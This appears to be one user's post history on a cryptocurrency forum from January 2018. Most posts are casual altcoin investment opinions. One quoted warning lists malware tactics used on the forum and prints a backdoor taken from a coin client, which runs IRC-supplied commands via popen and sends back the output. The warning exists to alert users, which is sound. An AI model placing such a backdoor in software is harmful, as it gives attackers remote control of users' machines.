121  Alternate cryptocurrencies / Altcoin Discussion / Re: Is Ripple the currency of the future? on: January 18, 2018, 11:14:23 AM
The banking industry can muscle the Ripple into the market. They will continue to improve the Ripple in the future due to the threat of flourishing Cryptocurrencies. In my opinion yes the possibility is there.
122  Alternate cryptocurrencies / Altcoin Discussion / Re: Get Rid Of Bitcoins ? on: January 18, 2018, 02:43:15 AM
Diversification is the key for real success in Crypt World. You should at least maintain 3 types of altcoins in your portfolio. Don't put your all eggs in one basket it's to risky.
123  Alternate cryptocurrencies / Altcoin Discussion / Re: What encourages you to invest in any altcoin? on: January 16, 2018, 11:51:53 PM
I read first the whitepaper then look for the management team if they are trustworthy. Last thing I look for is vision of project developer it is more on personal judgement but it is important because We all know there's a change that the project will not materialize.

125  Alternate cryptocurrencies / Altcoin Discussion / Re: Utrust is a scam? on: January 16, 2018, 04:43:50 AM
The ways I understand the question is the person asking if it is true or not. We'll only time will tell if it is scam. But base on paper it looks pretty legit. No way it's a scam.
126  Alternate cryptocurrencies / Altcoin Discussion / Re: HODL or REGRET!!! on: January 13, 2018, 05:52:32 AM
I'm really disappointed with myself now because of Verge. Way back June 2017, I bought $200 worth of XVG and I sold it last week a day before the pump happened. It could be worth more than $5k now if I just HODL. Cry Well, I need to move on and learn from this mistakes. This will be a lesson for me to have patience and wait for the right time to sell my coins. The reason why I sold it was because I need more funds to buy another coin. I'm happy with the coin I bought because I can now see that it is now starting to pump. Maybe, I'm just half disappointed every time I'm seeing the current value of Verge. I bought some XVG again and will surely hold it this time. Smiley I hope that this experience of mine can be a good example for everyone especially the newbies in this community.

I'm not yet investing in bitcoin or altcoin Newbie here. But I'm a stock market trader. I feel you when you sell your investment and after a day or week it went up to breakout. The strategy We make in stock market is We make a trading plan and make sure to stick with it. In that case regret will be minimize. Still though I feel your regret...
127  Local / Pilipinas / Re: Philippine News about cryptocurrency on: January 13, 2018, 12:52:36 AM
128  Alternate cryptocurrencies / Altcoin Discussion / Re: Will ICO die in 2018? on: January 12, 2018, 11:31:08 AM
ICO will not die certainly in 2018. But in my opinion it will show slow down due to the fact that ICO was abuse by some of the aspiring company that the main purpose is to deceive the general public.

130  Alternate cryptocurrencies / Altcoin Discussion / Re: Beware of Increasingly Sophisticated Malware Infection Attempts on: January 11, 2018, 02:03:05 AM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Hi there, I would like to ask if is safe to use incognito mode in goggle chrome. Or do I need to install software application that blocks the malware. Thanks in advance.
